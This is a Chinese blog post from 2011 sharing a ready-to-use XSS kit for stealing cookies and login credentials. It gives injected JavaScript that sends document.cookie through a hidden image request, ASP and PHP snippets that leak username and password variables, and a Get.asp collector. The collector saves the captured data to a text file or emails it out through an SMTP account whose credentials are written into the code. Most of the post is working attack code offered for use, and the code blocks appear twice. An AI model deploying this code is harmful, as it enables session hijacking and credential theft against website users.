XSS偷取密码Cookies通用脚本

分类:安全 | 2011-08-24 | 撸过 69 次
0人扯谈

很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。
今天写个通用脚本工具
文件如下
 

asp.asp或者php.php 或者cookies.htm效果如下
保存文本
 

发送邮件

 

获取的cookies

截获用户名密码
 

主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱
内容如下:使用方法:
asp.asp是Asp中调用Get.asp的例子内容如下
即在存在需要获取的变量的地方添加如下JS代码即可
通常在页面最下面添加即可。因为变量一般赋值后都不会清空。
如果在asp脚本中间需要添加JS则需要先闭合语句普通浏览复制代码打印代码

<%
username=”admin”
password=”admin888″%> <script src=”get.asp?username=<%=username%>&password=<%=password%>” />
<% response.write Response.Cookies()
%>
<%
username=”admin”
password=”admin888″
%>
<script src=”get.asp?username=<%=username%>&password=<%=password%>” />
<%
response.write Response.Cookies()
%>

普通浏览复制代码打印代码

<?
$username=”admin”; $password=”admin888″;
?>
<script src=”get.asp?username=<?=$username;?>&password=<?=$password;?>”/>
<?
$username=”admin”;
$password=”admin888″;
?>
<script src=”get.asp?username=<?=$username;?>&password=<?=$password;?>”/>

普通浏览复制代码打印代码

<script>
var url=”Get.asp?cookies=”+document.cookie;   var image = new Image();
image.style.width = 0;   image.style.height = 0;
image.src = url;
</script>
<script>
var url=”Get.asp?cookies=”+document.cookie;
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = url;
</script>
php.php是PHP中使用例子。代码如下:cookies.htm是用来获取Cookies的例子
代码如下:有任何问题和意见跟帖。。。
另外。
所有的参数可以自己添加。你可以Get.asp?a=abc&b=abc&c=abcZ&…多少个变量都行…Get.asp?账号=abc&密码=abc这样也可以
具体自己用用就明白了。
需要深入处理Cookies的自己根据实际情况调整吧。。
这只是一个通用的。方便例子。呼呼。
普通浏览复制代码打印代码

<%   
SaveFile=”pass.txt”
‘保存获取数据的TXT
IfSendMail=true ‘是否使用邮件发送,如果True则发送邮件不保存TXT 如果false则保存txt而不发送邮件YourSendMail=”webshell@163.com”
‘用来发送的邮箱
YourSendMailUser=”521hack”
‘邮箱登陆用户名YourSendMailPass=”123456abcf”
‘邮箱登陆密码 (以上3项邮箱、账号、密码改成自己的) 这里用我的备用邮箱给你们测试,24小时后我修改密码…
YourSendMailServer=”smtp.163.com”
‘邮件服务器YourMailTitle=”有新截获的数据来了!”
‘邮件标题
YourRecvMail=”xxxx@qq.com”
‘收取截获数据的邮箱,建议使用QQ邮箱,可以实时提示,让你第时间得到要的信息
sub sendmail(content)
On error resume next   dim JMail
Set JMail = Server.CreateObject(“JMail.Message”)    JMail.Logging = TrueJMail.Charset = “gb2312”
JMail.ContentType = “text/html”JMail.From = YourSendMail   JMail.FromName = “”&YourSendMailUser
JMail.MailServerUserName = YourSendMailUser   JMail.MailServerPassword = YourSendMailPass
JMail.Priority = 1    JMail.AddRecipient YourRecvMail
JMail.Subject = YourMailTitle   JMail.Body = content
JMail.Send(“smtp.163.com”)    Set JMail = nothing
If err then    Response.write “发送失败!请检查配置!并确认你的服务器是否支持Jmail!”else   Response.write “发送成功!”end if   end sub

GetPostStr=Request.QueryString
if GetPostStr=”” then   Response.write “None!”end if
if ifsendmail then   StrTemp=Replace(GetPostStr,”=”,”:”)
StrTemp=Replace(StrTemp,”&”,”<br>”)   sendmail(StrTemp)
else   set F=server.CreateObject(“scripting.filesystemobject”)
set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0)   TempStr=Split(GetPostStr,”&”)
for TempI=0  To Ubound(TempStr)   I.WriteLine(Replace(TempStr(TempI),”=”,”:”))
next   I.WriteLine(now())
I.WriteLine(“——————————–“)   I.close
Set F=nothing   end if
%>
<%
SaveFile=”pass.txt” ‘保存获取数据的TXT
IfSendMail=true ‘是否使用邮件发送,如果True则发送邮件不保存TXT 如果false则保存txt而不发送邮件
YourSendMail=”521hack@163.com” ‘用来发送的邮箱
YourSendMailUser=”521hack” ‘邮箱登陆用户名
YourSendMailPass=”123456abcf” ‘邮箱登陆密码 (以上3项邮箱、账号、密码改成自己的) 这里用我的备用邮箱给你们测试,24小时后我修改密码…
YourSendMailServer=”smtp.163.com” ‘邮件服务器
YourMailTitle=”有新截获的数据来了!” ‘邮件标题
YourRecvMail=”xxxx@qq.com” ‘收取截获数据的邮箱,建议使用QQ邮箱,可以实时提示,让你第时间得到要的信息

sub sendmail(content)
On error resume next
dim JMail
Set JMail = Server.CreateObject(“JMail.Message”)
JMail.Logging = True
JMail.Charset = “gb2312”
JMail.ContentType = “text/html”
JMail.From = YourSendMail
JMail.FromName = “”&YourSendMailUser
JMail.MailServerUserName = YourSendMailUser
JMail.MailServerPassword = YourSendMailPass
JMail.Priority = 1
JMail.AddRecipient YourRecvMail
JMail.Subject = YourMailTitle
JMail.Body = content
JMail.Send(“smtp.163.com”)
Set JMail = nothing
If err then
Response.write “发送失败!请检查配置!并确认你的服务器是否支持Jmail!”
else
Response.write “发送成功!”
end if
end sub

GetPostStr=Request.QueryString
if GetPostStr=”” then
Response.write “None!”
end if

if ifsendmail then
StrTemp=Replace(GetPostStr,”=”,”:”)
StrTemp=Replace(StrTemp,”&”,”<br>”)
sendmail(StrTemp)
else
set F=server.CreateObject(“scripting.filesystemobject”)
set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0)
TempStr=Split(GetPostStr,”&”)
for TempI=0  To Ubound(TempStr)
I.WriteLine(Replace(TempStr(TempI),”=”,”:”))
next
I.WriteLine(now())
I.WriteLine(“——————————–“)
I.close
Set F=nothing
end if
%>

%> ‘闭合上半部分
这里是js
<% ‘闭合下半部分
%> ‘闭合上半部分
这里是js
<% ‘闭合下半部分 

本站内容均为原创,转载请务必保留署名与链接!
XSS偷取密码Cookies通用脚本:https://www.webshell.cc/885.html
标签:

相关日志